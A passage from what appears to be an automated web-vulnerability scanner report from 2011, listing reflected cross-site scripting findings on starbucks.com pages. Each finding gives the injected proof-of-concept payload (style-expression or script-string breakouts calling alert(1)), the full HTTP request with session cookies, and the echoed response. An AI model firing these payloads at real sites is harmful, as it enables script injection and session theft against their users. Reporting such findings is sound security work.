Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:20:06 GMT
Connection: close
Content-Length: 38510

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/about-us/company-information/product-advisories?4cd5c"style="x:expression(alert(1))"3d37d7257db=1" />
...[SNIP]...

2.9. http://www.starbucks.com/about-us/our-heritage [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/our-heritage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cfef"style%3d"x%3aexpression(alert(1))"1c51ac66bf6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5cfef"style="x:expression(alert(1))"1c51ac66bf6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /about-us/our-heritage?5cfef"style%3d"x%3aexpression(alert(1))"1c51ac66bf6=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:20:04 GMT
Connection: close
Content-Length: 37603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/about-us/our-heritage?5cfef"style="x:expression(alert(1))"1c51ac66bf6=1" />
...[SNIP]...

2.10. http://www.starbucks.com/business [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /business

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8439b"style%3d"x%3aexpression(alert(1))"d1ac5f7cb9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8439b"style="x:expression(alert(1))"d1ac5f7cb9a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /business?8439b"style%3d"x%3aexpression(alert(1))"d1ac5f7cb9a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:20:27 GMT
Connection: close
Content-Length: 36606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/business?8439b"style="x:expression(alert(1))"d1ac5f7cb9a=1" />
...[SNIP]...

2.11. http://www.starbucks.com/business/foodservice [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /business/foodservice

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56659"style%3d"x%3aexpression(alert(1))"563fe89e48e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 56659"style="x:expression(alert(1))"563fe89e48e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /business/foodservice?56659"style%3d"x%3aexpression(alert(1))"563fe89e48e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:21:28 GMT
Connection: close
Content-Length: 35775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/business/foodservice?56659"style="x:expression(alert(1))"563fe89e48e=1" />
...[SNIP]...

2.12. http://www.starbucks.com/business/international-stores [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /business/international-stores

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45cc2"style%3d"x%3aexpression(alert(1))"db7f4597e3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 45cc2"style="x:expression(alert(1))"db7f4597e3f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /business/international-stores?45cc2"style%3d"x%3aexpression(alert(1))"db7f4597e3f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:21:12 GMT
Connection: close
Content-Length: 36211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/business/international-stores?45cc2"style="x:expression(alert(1))"db7f4597e3f=1" />
...[SNIP]...

2.13. http://www.starbucks.com/business/licensed-stores [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /business/licensed-stores

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4641a"style%3d"x%3aexpression(alert(1))"960dd899042 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4641a"style="x:expression(alert(1))"960dd899042 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /business/licensed-stores?4641a"style%3d"x%3aexpression(alert(1))"960dd899042=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:21:26 GMT
Connection: close
Content-Length: 35650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/business/licensed-stores?4641a"style="x:expression(alert(1))"960dd899042=1" />
...[SNIP]...

2.14. http://www.starbucks.com/business/office-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /business/office-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c588f"style%3d"x%3aexpression(alert(1))"7c2218a24c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c588f"style="x:expression(alert(1))"7c2218a24c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /business/office-coffee?c588f"style%3d"x%3aexpression(alert(1))"7c2218a24c5=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:20:44 GMT
Connection: close
Content-Length: 37633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/business/office-coffee?c588f"style="x:expression(alert(1))"7c2218a24c5=1" />
...[SNIP]...

2.15. http://www.starbucks.com/career-center [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd912"style%3d"x%3aexpression(alert(1))"c7bd23ee043 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cd912"style="x:expression(alert(1))"c7bd23ee043 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /career-center?cd912"style%3d"x%3aexpression(alert(1))"c7bd23ee043=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:22:13 GMT
Connection: close
Content-Length: 42847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/career-center?cd912"style="x:expression(alert(1))"c7bd23ee043=1" />
...[SNIP]...

2.16. http://www.starbucks.com/career-center [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c23fe"%3balert(1)//0dffb39826 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c23fe";alert(1)//0dffb39826 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /career-center?c23fe"%3balert(1)//0dffb39826=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:22:15 GMT
Connection: close
Content-Length: 42747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
ext/javascript">
   var flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "96759753001";
   flashvars.playerLocation = "http://www.starbucks.com/career-center?c23fe";alert(1)//0dffb39826=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.17. http://www.starbucks.com/career-center/career-diversity [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center/career-diversity

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45639"style%3d"x%3aexpression(alert(1))"a3851b9f98e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 45639"style="x:expression(alert(1))"a3851b9f98e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /career-center/career-diversity?45639"style%3d"x%3aexpression(alert(1))"a3851b9f98e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:24:02 GMT
Connection: close
Content-Length: 38646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/career-center/career-diversity?45639"style="x:expression(alert(1))"a3851b9f98e=1" />
...[SNIP]...

2.18. http://www.starbucks.com/career-center/career-diversity/partner-networks [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center/career-diversity/partner-networks

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62b53"%3balert(1)//fc24e1787a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62b53";alert(1)//fc24e1787a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /career-center/career-diversity/partner-networks?62b53"%3balert(1)//fc24e1787a8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:24:21 GMT
Connection: close
Content-Length: 40731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
s = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "275225263001";
   flashvars.playerLocation = "http://www.starbucks.com/career-center/career-diversity/partner-networks?62b53";alert(1)//fc24e1787a8=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.19. http://www.starbucks.com/career-center/career-diversity/partner-networks [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center/career-diversity/partner-networks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae7f1"style%3d"x%3aexpression(alert(1))"dbb34cb95f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ae7f1"style="x:expression(alert(1))"dbb34cb95f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /career-center/career-diversity/partner-networks?ae7f1"style%3d"x%3aexpression(alert(1))"dbb34cb95f4=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:24:17 GMT
Connection: close
Content-Length: 40826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/career-center/career-diversity/partner-networks?ae7f1"style="x:expression(alert(1))"dbb34cb95f4=1" />
...[SNIP]...

2.20. http://www.starbucks.com/career-center/international-positions [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center/international-positions

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab6ec"style%3d"x%3aexpression(alert(1))"95aa1e09f92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ab6ec"style="x:expression(alert(1))"95aa1e09f92 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /career-center/international-positions?ab6ec"style%3d"x%3aexpression(alert(1))"95aa1e09f92=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:23:03 GMT
Connection: close
Content-Length: 36752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/career-center/international-positions?ab6ec"style="x:expression(alert(1))"95aa1e09f92=1" />
...[SNIP]...

2.21. http://www.starbucks.com/career-center/working-at-starbucks [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center/working-at-starbucks

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 287e3"%3balert(1)//6be60617140 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 287e3";alert(1)//6be60617140 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /career-center/working-at-starbucks?287e3"%3balert(1)//6be60617140=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:22:39 GMT
Connection: close
Content-Length: 43747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
   var flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "651624292001";
   flashvars.playerLocation = "http://www.starbucks.com/career-center/working-at-starbucks?287e3";alert(1)//6be60617140=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.22. http://www.starbucks.com/career-center/working-at-starbucks [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center/working-at-starbucks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 587cf"style%3d"x%3aexpression(alert(1))"c23cb73b348 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 587cf"style="x:expression(alert(1))"c23cb73b348 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /career-center/working-at-starbucks?587cf"style%3d"x%3aexpression(alert(1))"c23cb73b348=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:22:37 GMT
Connection: close
Content-Length: 43842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/career-center/working-at-starbucks?587cf"style="x:expression(alert(1))"c23cb73b348=1" />
...[SNIP]...

2.23. http://www.starbucks.com/coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee

Issue detail

